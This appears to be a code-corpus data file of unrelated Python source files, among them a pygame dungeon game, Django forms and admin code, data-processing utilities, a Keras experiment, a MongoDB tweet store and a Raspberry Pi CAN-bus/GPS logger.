        screen.blit(prompt, (200, 50))

    def update(self):
        pass

    def handle_events(self, events):
        """On SPACE, ask the scene manager to switch to the dungeon."""
        for event in events:
            if event.type == KEYDOWN and event.key == K_SPACE:
                self.manager.go_to(DungeonScene(0))
class Map(object):
    """Grid of block ids (see the BLOCK_* constants) with lazy room generation."""

    def __init__(self):
        # (TILES_ACROSS + 1) x (TILES_DOWN + 1) grid, all darkness initially.
        self.map = [[0] * (TILES_DOWN + 1) for _ in range(TILES_ACROSS + 1)]

    #Sets block enabled for redraw
    def clear_block(self, position):
        """Reset the tile at *position* (column, row) back to darkness."""
        column, row = position
        self.map[column][row] = 0

    def set_block(self, position, block_id):
        """Write *block_id* into the tile at *position* (column, row)."""
        column, row = position
        self.map[column][row] = block_id

    def print_ascii_map(self):
        """Dump the grid row by row for debugging."""
        for row in self.map:
            print(row)

    @staticmethod
    def convertTileToCoords(coords):
        """Translate a (tileX, tileY) grid position into pixel coordinates."""
        tile_x, tile_y = coords
        return (tile_x * TILE_W, tile_y * TILE_H)

    def generateRoomIfNotGenerated(self, position):
        """Roll a random room type (floor/wall/trap) for an unexplored tile."""
        col, row = position
        if self.map[col][row] == BLOCK_DARKNESS:
            self.map[col][row] = int(random.choice("234"))

    def generateRoomsAroundCoords(self, position):
        """Generate the four orthogonal neighbours of *position*, bounds-checked."""
        x, y = position
        for nx, ny in ((x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)):
            if 0 <= nx < len(self.map) and 0 <= ny < len(self.map[nx]):
                self.generateRoomIfNotGenerated((nx, ny))

    def isTraversable(self, position):
        """Walls block movement; every other block type is walkable."""
        x, y = position
        if self.map[x][y] == BLOCK_WALL:
            return False
        return True
def getBattleEntities():
    """Build the hard-coded demo encounter: three mages versus two zombies."""
    def configure(entity, name, position, initiative):
        # Attach the common battle attributes and hand the entity back.
        entity.name = name
        entity.position = position
        entity.initiative = initiative
        return entity

    t1 = configure(PlayerMage(), 'TankTwo', 2, 6)
    t2 = configure(PlayerMage(), 'TankOne', 1, 2)
    # NOTE(review): duplicate name 'TankOne' -- intended?
    h1 = configure(PlayerMage(), 'TankOne', 3, 4)
    e1 = configure(MonsterZombie(), 'EnemyOne', 1, 5)
    e2 = configure(MonsterZombie(), 'EnemyTwo', 2, 3)
    return [t1, t2, h1, e1, e2]
def main():
    """Game entry point: initialize pygame and run the scene loop until quit."""
    pygame.init()
    screen = pygame.display.set_mode((SCREEN_W, SCREEN_H))
    DisplayDevice.Instance().setScreen(screen)
    running = True
    manager = SceneMananger()
    while running:
        # A pending QUIT event ends the loop immediately.
        if pygame.event.get(QUIT):
            running = False
            return
        events = pygame.event.get()
        # Let the active scene consume input, advance, and draw this frame.
        manager.scene.handle_events(events)
        manager.scene.update()
        manager.scene.render(screen)
        pygame.display.flip()
        # Global hotkeys: ESC quits, F1-F3 jump between scenes.
        for event in events:
            if not hasattr(event, 'key'): continue
            # NOTE(review): this ESC check runs for KEYUP as well as KEYDOWN
            # (both carry .key) -- confirm that is intended.
            if event.key == K_ESCAPE:
                print "ESC pressed"
                sys.exit(0)
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_F1:
                    manager.go_to(TitleScene())
                if event.key == pygame.K_F2:
                    manager.go_to(DungeonScene(0))
                if event.key == pygame.K_F3:
                    manager.go_to(BattleScene(
                        getBattleEntities()
                    ))

if __name__ == "__main__":
    main()
|
23,165 | 60efe75099b8d685b9c1eeeea7db4f1fc15dab5f | import pandas as pd
from scipy import sparse
import numpy as np
from data.misc import is_blank
from features.process_text import process_text_tokenize_detokenize
def locate_empty_strings(flora_data_frame_text):
    """Return a boolean index of rows whose text is non-blank.

    The result can be used to filter a DataFrame,
    e.g. ``df[locate_empty_strings(df.text)]``.

    :param flora_data_frame_text: pandas Series of strings.
    :return: boolean Series, True where the stripped text is not blank.
    """
    # isinstance also accepts Series subclasses (the old `type(...) ==` did not).
    assert isinstance(flora_data_frame_text, pd.Series), 'Input is not a pandas Series'
    # Convert all whitespace to nothing so strings of spaces/tabs/newlines test
    # as blank, https://stackoverflow.com/questions/2405292/how-to-check-if-text-is-empty-spaces
    # -tabs-newlines-in-python
    flora_data_frame_text = flora_data_frame_text.map(lambda x: x.strip())
    # `~` negation instead of the non-idiomatic `== False` comparison.
    indx = ~flora_data_frame_text.map(is_blank)
    return indx
def process_length_in_place(flora_data_frame, tokenized_stop_words):
    """Process text using the same text processing procedure as was used in the DTM/TFIDF models, and recreate the
    length column with the cleaned text strings. This results in a more accurate length metric.

    :param flora_data_frame: DataFrame with at least 'text' and 'length' columns.
    :param tokenized_stop_words: stop words forwarded to the tokenizer.
    :return:
    flora_data_frame with revised text length column and rows with only blanks or empty text
    strings removed."""
    before_process_length = flora_data_frame.text.apply(len)
    # Applying the same text processing used in the DTM/TFIDF models
    flora_data_frame.text = process_text_tokenize_detokenize(flora_data_frame.text, tokenized_stop_words)
    # Remove strings with no textual data
    flora_data_frame_no_empty = flora_data_frame[locate_empty_strings(flora_data_frame.text)]
    # NOTE(review): these asserts fail on already-clean input (no blank rows /
    # nothing removable); they assume the incoming data is "dirty" -- confirm.
    assert flora_data_frame_no_empty.shape[0] < flora_data_frame.shape[0], 'Rows with empty text strings not removed'
    after_process_length = flora_data_frame_no_empty.text.apply(len)
    assert sum(after_process_length) < sum(before_process_length), 'Text not processed'
    # Add new length data to data frame
    length_processed_flora_data_series = pd.concat(
        [flora_data_frame_no_empty.text, after_process_length.rename('length')], axis=1)
    flora_data_frame_no_empty = flora_data_frame_no_empty.drop(columns='length')
    flora_data_frame_no_empty = flora_data_frame_no_empty.drop(columns='text')
    flora_data_frame_no_empty = pd.concat([flora_data_frame_no_empty, length_processed_flora_data_series], axis=1)
    return flora_data_frame_no_empty
def prepare_length_features(text_counts, custom_vec, length_processed_flora_data_frame):
    """Build a sparse feature matrix of token counts plus a text-length column.

    :param text_counts: sparse document-term matrix.
    :param custom_vec: fitted vectorizer exposing ``get_feature_names()``.
    :param length_processed_flora_data_frame: DataFrame whose 'length' column
        aligns row-wise with ``text_counts``.
    :return: scipy CSR matrix with one extra rightmost column of lengths.
    """
    # https://stackoverflow.com/questions/39121104/how-to-add-another-feature
    # -length-of-text-to-current-bag-of-words-classificati
    vocab = custom_vec.get_feature_names()
    features = pd.DataFrame(text_counts.toarray(), columns=vocab)
    lengths = length_processed_flora_data_frame['length'].reset_index(drop=True)
    features = pd.concat([features, lengths], axis=1)
    length_model_sparse = sparse.csr_matrix(features.values.astype(np.float64))
    assert length_model_sparse.shape > text_counts.shape, 'Length model should have one more column of data than BOW ' \
                                                          'model '
    return length_model_sparse
|
23,166 | 544c7a9e633b17e39eb44ebaa281732f6770dc1b | from django import forms
from seyitechapp.models import *
class Msg(forms.ModelForm):
    """Contact form backed by the Message model."""
    # BUG FIX: these fields were declared with models.* field classes, which
    # are not valid as form fields; use the forms.* equivalents (Textarea
    # widget standing in for the model-side TextField).
    username = forms.CharField(max_length=30)
    email = forms.EmailField()
    subject = forms.CharField(max_length=15)
    messages = forms.CharField(widget=forms.Textarea)

    class Meta:
        model = Message
        fields = ('username', 'email', 'subject', 'messages')

    def save(self, commit=True):
        """Copy the cleaned data onto the instance and persist it.

        BUG FIX: the old code returned the Message *class*; callers expect the
        saved instance, matching Django's ModelForm.save contract.
        """
        user = super().save(commit=False)
        user.username = self.cleaned_data['username']
        user.email = self.cleaned_data['email']
        user.subject = self.cleaned_data['subject']
        user.messages = self.cleaned_data['messages']
        if commit:
            user.save()
        return user
23,167 | 1b0066dffbf61fe07e16cea8c43d0dbadab48764 | from django.contrib import admin
# Register your models here.
from django.utils.html import format_html
from .models import Meme
class MemeAdmin(admin.ModelAdmin):
    """Admin configuration for Meme posts with an inline image preview."""
    list_display = ('post_id', 'thumbnail', 'pub_date', 'post_url', 'views', 'valid',)
    list_editable = ('valid', 'views')
    # NOTE(review): 'thumbnail' is a method; listing it in `fields` requires it
    # to also appear in `readonly_fields` on modern Django -- confirm.
    fields = ('views', 'thumbnail',)
    ordering = ('-pub_date',)

    def thumbnail(self, obj):
        # BUG FIX: pass the URL as a format_html *argument* so it is escaped.
        # The old code did `format_html(u'...%s...' % obj.image_url)`, which
        # interpolated the raw URL before escaping and then marked the whole
        # string safe, defeating the XSS protection format_html provides.
        return format_html(u'<img src="{}" height="400" width="400"/>', obj.image_url)
    # No-op since Django 1.9 (format_html output is already safe); kept for
    # compatibility with very old Django versions.
    thumbnail.allow_tags = True

admin.site.register(Meme, MemeAdmin)
|
23,168 | c3beca2cf0ca4be2130043cbf6f374fbbb6b06c7 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = "张开"
# Date: 2019/11/25
import os
import datetime

# Project layout: this file lives one level below the repo root; test data
# sits under <repo>/data.
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATA_PATH = os.path.join(BASE_PATH, 'data')

# Name of the Excel workbook holding the test cases.
file_name = '接口测试示例-2.xlsx'
TEST_CASE_FILE_NAME = os.path.join(DATA_PATH, file_name)

# ---------------- logging --------------------
# Log levels.
LOG_LEVEL = 'debug'
LOG_STREAM_LEVEL = 'debug'  # console (stream) handler level
LOG_FILE_LEVEL = 'info'  # file handler level
# Log file path, one file per day.
LOG_FILE_NAME = os.path.join(BASE_PATH, 'logs', datetime.datetime.now().strftime('%Y-%m-%d') + '.log')

# ----------------- allure reporting ----------------
# Command that turns the raw results into the allure HTML report.
result_path = os.path.join(BASE_PATH, 'report', 'result')
allure_html_path = os.path.join(BASE_PATH, 'report', 'allure_html')
ALLURE_COMMAND = 'allure generate {} -o {} --clean'.format(result_path, allure_html_path)
# Root directory of the allure report.
ALLURE_REPORT_PATH = os.path.join(BASE_PATH, 'report')

# ------------ mail settings --------------
MAIL_HOST = "smtp.qq.com"  # SMTP server
MAIL_USERNAME = "你的qq邮箱"  # account name (placeholder: your QQ mailbox)
MAIL_PASSPHRASE = "你的QQ授权码"  # QQ SMTP authorization code (placeholder)
MAIL_SENDER = '12061xxx@qq.com'  # sender address
MAIL_RECEIVED = ['1206xxxxx@qq.com']  # recipients; your QQ mailbox or any other
# Mail subject.
MAIL_SUBJECT = '{} 执行{}的测试报告'.format(datetime.datetime.now().strftime('%Y-%m-%d'), file_name)
# Mail body.
MAIL_CONTENT = '请查阅 - {}\n注意,在解压后使用pycharm打开'.format(MAIL_SUBJECT)

if __name__ == '__main__':
    print(ALLURE_COMMAND)
23,169 | fac075c7497161e0284704d7721e7d40d9a06fab | import socket
HOST = "0.0.0.0"  # bind on all interfaces
PORT = 8888
def response():
    """Return the HTML body served for every request.

    BUG FIX: the closing tags were mis-ordered (``</html></body>``); tags must
    close in reverse order of opening.
    """
    return "<html><body><h1>Hello World</h1></body></html>"
def worker(sck):
    """Serve one HTTP request on *sck*: send a fixed 200 response and close.

    :param sck: a connected socket returned by accept().
    """
    body = response()
    # Status line and headers; Content-Length assumes an ASCII body
    # (character count == byte count here).
    header_lines = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/html",
        "Content-Length: " + str(len(body)),
    ]
    for line in header_lines:
        sck.send(bytes(line + "\r\n", "UTF-8"))
    sck.send(bytes("\r\n", "UTF-8"))  # blank line terminates the headers
    sck.send(bytes(str(body), "UTF-8"))
    sck.close()
if __name__ == "__main__":
    # Listening socket; SO_REUSEADDR allows quick rebinds after a restart.
    ssck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ssck.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ssck.bind((HOST, PORT))
    ssck.listen(1)
    print("server start!")
    # Handle one connection at a time, forever.
    while True:
        sck,addr = ssck.accept()
        worker(sck)
23,170 | c80f89f9049db6a6e35f69f04adc473dfa61e48d | from .photoloader import IcedIDPhotoLoader
from .peloader import IcedIDPELoader
|
def solve(x, y, d, cnt):
    """DFS for the longest closed diamond path back to the start (sx, sy).

    x, y -- current cell; d -- index of the current diagonal in `dd` (0..3);
    cnt -- steps taken so far.  Returns the best closed-path length reachable
    from this state, or 0 when none exists.  Relies on module globals:
    a (grid), sx/sy (start cell), temp (values already on the path), dd.
    """
    if d > 3:                  # all four directions used without closing
        return 0
    if scope(x, y):            # walked off the board
        return 0
    if x == sx and y == sy:    # loop closed -- path length is the answer
        return cnt
    if a[x][y] in temp:        # value already collected on this path
        return 0
    temp.append(a[x][y])
    # Either keep the current direction d, or turn to the next one (d + 1).
    best = max(solve(x + dd[d][0], y + dd[d][1], d, cnt + 1),
               solve(x + dd[d + 1][0], y + dd[d + 1][1], d + 1, cnt + 1))
    temp.pop()
    return best
# The four diagonal directions in order; dd[4] is a sentinel so that
# dd[d + 1] stays a valid lookup when d == 3 (solve rejects d > 3 anyway).
dd = [(1, 1), (-1, 1), (-1, -1), (1, -1), (0, 0)]

def scope(nx, ny):
    """Return 1 when (nx, ny) lies outside the n x n board, else 0."""
    if 0 <= nx < n and 0 <= ny < n:
        return 0
    return 1
# One test case per block of input: the board size n, then the n x n grid.
for t in range(int(input())):
    n = int(input())
    a=[list(map(int,input().split()))for _ in range(n)]
    ans = 0
    # Try every cell as the diamond's start, always stepping first in
    # direction dd[0]; print -1 when no closed path exists.
    for i in range(n):
        for j in range(n):
            temp=[a[i][j]]
            sx , sy = i, j
            ans = max(ans, solve(i+dd[0][0], j+dd[0][1], 0, 1))
    print('#{} {}'.format(t+1, ans if ans!=0 else -1))
|
23,172 | 856e78c28d0ef485bd6c5f4eee8ffff00c66a78f | """
auther: LeeCHH
"""
import numpy as np
def rle2mask(rle, height, width):
    """Decode an RLE string ("start length start length ...", 1-based offsets,
    column-major order) into a boolean mask of shape (height, width, 1)."""
    flat = np.zeros(width * height, dtype='bool')
    numbers = [int(token) for token in rle.strip().split()]
    for start, run in zip(numbers[0::2], numbers[1::2]):
        flat[start - 1:start + run - 1] = True
    return flat.reshape((height, width, 1), order='F')
def mask2rle(img):
    """Encode a binary mask as a run-length string (column-major, 1-based).

    Adapted from
    https://www.kaggle.com/paulorzp/rle-functions-run-lenght-encode-decode

    img: numpy array, 1 -> mask, 0 -> background
    Returns run length as string formated
    """
    # Pad with zeros on both ends so every run has a detectable start and end.
    padded = np.concatenate([[0], img.T.flatten(), [0]])
    change_points = np.where(padded[1:] != padded[:-1])[0] + 1
    # Turn every (start, end) pair into (start, length).
    change_points[1::2] -= change_points[::2]
    return ' '.join(str(v) for v in change_points)
23,173 | 3e2601b2f099143a1d0ce91d0e9fd4976fff94ec | import pytest
from src.algs.sorting import insertion_sort, selection_sort, merge_sort, \
quick_sort, quick_sort_inplace, min_heap_sort, max_heap_sort, bubble_sort
def create_task(lst):
    """Return a closure asserting that *algorithm* returns *lst* sorted."""
    def task(algorithm):
        # Compute the expectation at call time so in-place mutations of *lst*
        # between calls are reflected.
        expected = sorted(lst)
        assert algorithm(lst) == expected
    return task
@pytest.mark.parametrize('task', map(create_task, [
    # No items
    [],
    # One item
    [42],
    # Two sorted items
    [4, 8],
    # Two unsorted items
    [8, 4],
    # Many sorted items
    [0, 4, 8, 15, 16, 23, 42, 42],
    # Many unsorted items
    [0, 4, -8, 15, -16, 23, -42, -42],
    # Same items
    [42] * 8,
]))
@pytest.mark.parametrize('algorithm', [
    insertion_sort,
    selection_sort,
    merge_sort,
    quick_sort,
    quick_sort_inplace,
    min_heap_sort,
    max_heap_sort,
    bubble_sort,
])
def test_sorting(task, algorithm):
    # Stacked parametrize decorators run the cartesian product: every
    # algorithm is exercised against every fixture list above.
    task(algorithm)
|
23,174 | df052574571d74272483245544f1fc189bd4d861 |
from __future__ import print_function
from keras.models import Sequential
from keras.layers import Dense, Input
from keras.models import Model
from keras.callbacks import EarlyStopping
from keras.layers.normalization import BatchNormalization
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.tri as tr
from mpl_toolkits.mplot3d import axes3d, Axes3D
from matplotlib import cm
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # disable tensorflow warnings
np.random.seed(21345)  # deterministic data generation
epochs = 30
N = 12000 # number of points in the train set
N_test = 3000 # number of points in the test set
A = [[4, 9, 2], [8, 1, 6], [3, 5, 7]]  # fixed 3x3 system matrix of f(x) = ||Ax - y||^2
#################################Gradient Descent function#############################################################
def gradientDescent(m, A, y, x_start, encoder, model, alpha):
    """Run *m* steps of projected gradient descent on f(x) = ||Ax - y||^2.

    At each step the current x is fed through the trained encoder (2-D
    latent position) and the full model (predicted objective value); the
    concatenated 3-vector is recorded in the returned (m, 3) trajectory.

    Args:
        m: number of gradient steps to take.
        A: (3, 3) system matrix.
        y: (3, 1) target vector.
        x_start: (3, 1) initial point (list of lists or ndarray).
        encoder: object with .predict mapping a (1, 3) row to (1, 2).
        model: object with .predict mapping a (1, 3) row to (1, 1).
        alpha: gradient-step size.

    Returns:
        (m, 3) ndarray: [latent_x, latent_y, predicted_f] per step.
    """
    trajectory = np.empty((m, 3))
    x = np.asarray(x_start, dtype=float)
    for step in range(m):
        # Record the encoder/model view of the current iterate.
        x_input = np.expand_dims(np.squeeze(np.transpose(x)), axis=0)
        z_pos = encoder.predict(x_input)
        y_output = model.predict(x_input)
        trajectory[step, :] = np.concatenate((z_pos, y_output), axis=1)
        # Gradient of ||Ax - y||^2 is 2 * A^T (Ax - y).
        residual = np.dot(A, x) - y
        x = x - alpha * 2 * np.dot(np.transpose(A), residual)
        # Project onto the feasible region x >= 0 (the objective elsewhere
        # in this script penalizes negative components).  The original
        # `for j in x_start: i = max(0, i)` loop was a no-op that only
        # rebound the loop counter; this is the intended clamp.
        x = np.maximum(x, 0)
    return trajectory
################################Generate points #######################################################################
X1 = 0.1666 * np.random.rand(1, N) - 0.0833
X2 = 1.666 * np.random.rand(1, N) - 0.833
X3 = 0.1666 * np.random.rand(1, N) - 0.0833
# concetenate values into a matrix
X = np.concatenate((X1, X2, X3))
# get the coordinates for each point
x1 = np.asarray(X[0, :])
x2 = np.asarray(X[1, :])
x3 = np.asarray(X[2, :])
# set Z=A*x for x1 and x2
Z = np.dot(A, X)
z1nn = np.asarray(Z[0, :])
z2nn = np.asarray(Z[1, :])
z3nn = np.asarray(Z[2, :])
# set y
y1nn = np.full((1, N), 8)
y2nn = np.full((1, N), 2)
y3nn = np.full((1, N), 5)
# calculate the function f(x)=||y-Ax||^2
fnn = np.transpose((y1nn - z1nn) ** 2 + (y2nn - z2nn) ** 2 + (y3nn - z3nn) ** 2)
# constraint, x returns a big value if x_i<0 and returns 0 elsewhere
for i in range(len(X)):
for j in range(len(X[i])):
if X[i][j] < 0:
fnn[i] = 100000
# modify X so it can be trainable
X_train = np.transpose(X)
################################ Create the model ######################################################################
model = Sequential()
input = Input(shape=(X_train.shape[1],))
hidden1 = Dense(100, activation='elu')(input)
hidden2 = Dense(100, activation='elu')(hidden1)
hidden3 = Dense(100, activation='elu')(hidden2)
hidden4 = Dense(2, activation='elu')(hidden3)
hidden5 = BatchNormalization()(hidden4)
hidden6 = Dense(50, activation='relu')(hidden5)
hidden7 = Dense(50, activation='relu')(hidden6)
hidden8 = Dense(50, activation='relu')(hidden7)
output = Dense(1, activation='linear')(hidden8)
# Encoder
Encoder = Model(input, hidden5)
model = Model(input, output)
# Decoder
encoded_input = Input(shape=(2,))
decoder1 = model.layers[-4](encoded_input)
decoder2 = model.layers[-3](decoder1)
decoder3 = model.layers[-2](decoder2)
decoder4 = model.layers[-1](decoder3)
Decoder = Model(encoded_input, decoder4)
# compile the model
model.compile(loss='mean_squared_error', optimizer='rmsprop')
# Early stopping and fit data
callback = [EarlyStopping(monitor='val_loss', patience=2, min_delta=0.01, verbose=0)]
model.fit(X_train, fnn, epochs=epochs, verbose=1, validation_split=0.25, callbacks=callback)
################### Create testing data #####################################################################
X1test = 0.1666 * np.random.rand(1, N_test) - 0.0833
X2test = 1.666 * np.random.rand(1, N_test) - 0.833
X3test = 0.1666 * np.random.rand(1, N_test) - 0.0833
Xtest = np.concatenate((X1test, X2test, X3test))
x1test = np.asarray(Xtest[0, :])
x2test = np.asarray(Xtest[1, :])
x3test = np.asarray(Xtest[2, :])
Ztest = np.dot(A, Xtest)
z1nntest = np.asarray(Ztest[0, :])
z2nntest = np.asarray(Ztest[1, :])
z3nntest = np.asarray(Ztest[2, :])
y1nntest = np.full((1, N_test), 8)
y2nntest = np.full((1, N_test), 2)
y3nntest = np.full((1, N_test), 5)
fnntest = np.transpose((y1nntest - z1nntest) ** 2 + (y2nntest - z2nntest) ** 2 + (y3nntest - z3nntest) ** 2)
# constraint, x returns a big value if x_i<0 and returns 0 elsewhere
for i in range(len(Xtest)):
for j in range(len(Xtest[i])):
if Xtest[i][j] < 0:
fnntest[i] = 100000
break
Xtest = np.squeeze(np.transpose(Xtest))
################### predict #######################################################################################
# predict the objective function for Xtest
low_dim = Encoder.predict(Xtest)
# gradient predict from decoder
X1dtest = 100 * np.random.rand(1, N_test) - 25
X2dtest = 100 * np.random.rand(1, N_test) - 25
Xdtest = np.concatenate((X1dtest, X2dtest))
Xdtest = np.squeeze(np.transpose(Xdtest))
triangd = tr.Triangulation(Xdtest[:, 0], Xdtest[:, 1])
dlow_dim = Decoder.predict(Xdtest) # one dimensional decoder output
triang = tr.Triangulation(low_dim[:, 0], low_dim[:, 1])
################### gradient##########################################################################################
A = np.array([[4, 9, 2], [8, 1, 6], [3, 5, 7]])
y = np.asarray([[8], [2], [5]])
pre_X = [[55], [10], [23]]
lr = 0.0001
iter = 50
gd = gradientDescent(iter, A, y, pre_X, Encoder, model, lr)
# returns z if z>0 and returns 0 otherwise
for i in range(len(gd)):
for j in range(len(gd[i])):
if gd[i][j] < 0:
gd[i][j] = 0
print(gd)
################### plot the result ###########################################################################
# plt.figure(figsize=(4,4)) #generate figure with a size of 9x4 inches
# # ax=plt.subplot(121)#subplot 1 row 2 columns the first item
# # plt.tricontour(triang, np.squeeze(fnntest))#draw contour lines
# # plt.colorbar()#draw colorbar
# # plt.tricontour(triang, np.squeeze(fnntest))#draw contour lines
# # plt.plot(gd[:,0], gd[:,1], 'r')
# # plt.title("True Objective")#set title
#
# ax=plt.subplot(122)#subplot 1 row 2 columns the second item
# plt.tricontour(triangd, np.squeeze(dlow_dim))#draw contour lines
# plt.colorbar()#draw colorbar
# plt.tricontour(triangd, np.squeeze(dlow_dim))#draw contour lines
# plt.plot(gd[:,0], gd[:,1], 'r')
# plt.title("NN Estimated Objective")
#
# plt.show()
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.scatter(np.squeeze(np.asarray(gd[:, 0])), np.squeeze(np.asarray(gd[:, 1])), np.squeeze(np.asarray(gd[:, 2])), c='r',
marker='o')
ax.plot(np.squeeze(np.asarray(gd[:, 0])), np.squeeze(np.asarray(gd[:, 1])), np.squeeze(np.asarray(gd[:, 2])), c='r')
surf1 = ax.plot_trisurf(triang, np.squeeze(fnntest), cmap=plt.cm.viridis,
linewidth=0, antialiased=False)
fig.colorbar(surf1, shrink=0.5, aspect=5) # Add a color bar which maps values to colors.
plt.title("True Objective") # set title
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.scatter(np.squeeze(np.asarray(gd[:, 0])), np.squeeze(np.asarray(gd[:, 1])), np.squeeze(np.asarray(gd[:, 2])), c='r',
marker='o')
ax.plot(np.squeeze(np.asarray(gd[:, 0])), np.squeeze(np.asarray(gd[:, 1])), np.squeeze(np.asarray(gd[:, 2])), c='r')
surf2 = ax.plot_trisurf(triangd, np.squeeze(dlow_dim), cmap=plt.cm.viridis,
linewidth=0, antialiased=False)
fig.colorbar(surf2, shrink=0.5, aspect=5) # Add a color bar which maps values to colors.
plt.title("NN Estimated Objective")
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
plt.show() # show plot (this blocks the code: make sure it's at the end of your code)
|
23,175 | eb0c7cf370a91d5ca03cfea3adac8aba2c3d14b2 | #Tabuada
# Multiplication table: print n x 1 through n x 10 for a user-supplied n.
n = int(input('Digite um numero: '))
for cont in range(1, 11):
    print('{} x {:2} = {}'.format(n, cont, cont * n))
23,176 | f5a02a951d340021229ada22b684f778ba84018c | import os
from pymongo import MongoClient
from pymongo.errors import BulkWriteError
class Database:
    """MongoDB-backed tweet store with duplicate-safe bulk inserts."""
    def __init__(self, logger):
        """Connect to MongoDB using MONGO_* environment variables."""
        self.logger = logger
        self.__load_db()
    def __load_db(self):
        # Open the client and ensure the unique index on "id" that makes
        # inserting an already-stored tweet raise BulkWriteError.
        self.__set_envs()
        self.client = MongoClient(
            self.mongo_ip,
            self.mongo_port,
            username=self.mongo_username,
            password=self.mongo_password,
        )
        database = self.client.tweets_db
        self.tweets_collection = database.tweets_collection
        self.tweets_collection.create_index("id", unique=True)
    def __del__(self):
        # Best-effort cleanup; __del__ timing is interpreter-dependent.
        self.client.close()
    def __set_envs(self):
        # Defaults target a local development MongoDB instance.
        # NOTE(review): when MONGO_PORT is set in the environment it is a
        # string while the default is an int -- confirm MongoClient
        # accepts both forms.
        self.mongo_ip = os.environ.get("MONGO_IP", "127.0.0.1")
        self.mongo_port = os.environ.get("MONGO_PORT", 27017)
        self.mongo_username = os.environ.get("MONGO_USERNAME", "mongo")
        self.mongo_password = os.environ.get("MONGO_PASSWORD", "mongopw")
    def save(self, data):
        """Insert documents, skipping duplicates.

        Returns the number of documents actually inserted.  With
        ordered=False, pymongo inserts all non-duplicates and reports the
        duplicates in BulkWriteError.details.
        """
        try:
            result = self.tweets_collection.insert_many(data, ordered=False)
            inserted_count = len(result.inserted_ids)
            return inserted_count
        except BulkWriteError as error:
            duplicated_amount = len(error.details["writeErrors"])
            inserted_count = error.details["nInserted"]
            self.logger.debug(error.details)
            self.logger.info(f"Duplicated documents: {duplicated_amount}")
            self.logger.info(f"Non-duplicated documents count: {inserted_count}")
            return inserted_count
    def get_tweets(self):
        """Return a cursor over all stored tweets."""
        return self.tweets_collection.find()
|
23,177 | 7aa619c97b426952d95ca2d218cb9369dc2fb4d6 | import click
from epigen.commands.command import CommandWithHelp
from epigen.plink import generate
from epigen.util import probability
# CLI command: generate a genotype-only plink dataset (no phenotype).
# Comments only -- a docstring here would change click's --help output.
@click.command( 'data', cls = CommandWithHelp, short_help="Generates a plink file without a phenotype." )
@click.option( '--maf', nargs=2, type=probability.probability, help='If set MAF is generated uniformly between these two values (default use exp distribution).', default = None )
@click.option( '--nsamples', type=int, help='The number of samples.', default = 2000 )
@click.option( '--nvariants', type=int, help='The number of variants.', default = 10000 )
@click.option( '--create-pair/--no-create-pair', help='Create a .pair file in the output prefix that contains all possible pairs of variants.', default = False )
@click.option( '--out', help='Output plink file.', type=click.Path( writable = True ), required = True )
def epigen(maf, nsamples, nvariants, create_pair, out):
    # Delegate dataset generation to epigen.plink.generate.write_single.
    generate.write_single( nvariants, nsamples, out, maf = maf, create_pair = create_pair )
|
# Print a 5-row triangle: row i has i '$' markers followed by i-1 '*'
# markers, each marker followed by a single space.  The original used
# manual while-loop counters and the cryptic `end='' ''` idiom (two
# adjacent string literals concatenated to ' '); output is unchanged.
for i in range(1, 6):
    for _ in range(i):
        print('$', end=' ')
    for _ in range(i - 1):
        print('*', end=' ')
    print()
23,179 | b3a49623585ab87483b39e3b1a33cf08b4c2da35 | #!/usr/bin/python3
import helper_functions as hf
import RPi.GPIO as GPIO
import can
import time
import os
import queue
from threading import Thread
from datetime import datetime
from gps3 import gps3
# initial Raspi setup for CAN Shield interfacing
led = 22
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(led,GPIO.OUT)
GPIO.output(led,True)
# configure Gps
gpsd_socket = gps3.GPSDSocket()
data_stream = gps3.DataStream()
gpsd_socket.connect()
gpsd_socket.watch()
# Bring up can0 interface at 500kbps
os.system("sudo /sbin/ip link set can0 up type can bitrate 500000")
time.sleep(0.1)
try:
bus = can.interface.Bus(channel='can0', bustype='socketcan_native')
except OSError:
print('Cannot find PiCAN board.')
GPIO.output(led,False)
exit()
tx_file = 0
rx_file = 0
def can_rx_task():
    """Background thread: forward OBD-II PID reply frames to q_CAN.

    Runs forever; relies on the module-level `bus` and `q_CAN` objects.
    Frames with any other arbitration id are silently dropped.
    """
    while True:
        message = bus.recv()
        if message.arbitration_id == hf.PID_REPLY:
            q_CAN.put(message)
def can_gps_task():
    """Background thread: push raw gpsd reports onto q_GPS forever."""
    # read GPS data
    while True:
        # The inner for/break pattern takes one report from the socket
        # iterator, queues it, then restarts iteration from the top.
        for new_data in gpsd_socket:
            if new_data:
                q_GPS.put(new_data)
                break
            else:
                continue
q_CAN = queue.Queue()
q_GPS = queue.Queue()
rx = Thread(target = can_rx_task)
rx.start()
tx = Thread(target = can_gps_task)
tx.start()
temperature = 0
rpm = 0
speed = 0
throttle = 0
distance = 0
distance_total = 0
time2 = 0
time1 = 0
vspeed2 = 0
vspeed1 = 0
curr_lat = 0
prev_lat = 0
curr_lon = 0
prev_lon = 0
curr_lat_temp = 0
curr_lon_temp = 0
first_time12 = True
logged_data = ''
count = 0
sp_count = 0
time_spent_at_stop = 0.0
time_start_at_stop = 0.0
#file_count = 0
outfile = 0
outfile_name = 0
file_name = ''
DEPOT_BEGIN = True
STARTED_FROM_DEPOT = False
STARTED_FROM_ROUTE = True
RETURN_TO_DEPOT = False
CIRCULATOR = True
FIRST_TIME_START = True
NEW_DATA_START_LOC = False
NEW_DATA_STOP_LOC = False
# Main control starts
try:
file_open = False
while True:
GPIO.output(led,True)
# Send Throttle position request
msg = can.Message(arbitration_id=hf.PID_REQUEST,data=[0x02,0x01,hf.THROTTLE,0x00,0x00,0x00,0x00,0x00],extended_id=False)
bus.send(msg)
while(q_CAN.empty() == True):
pass
message = q_CAN.get()
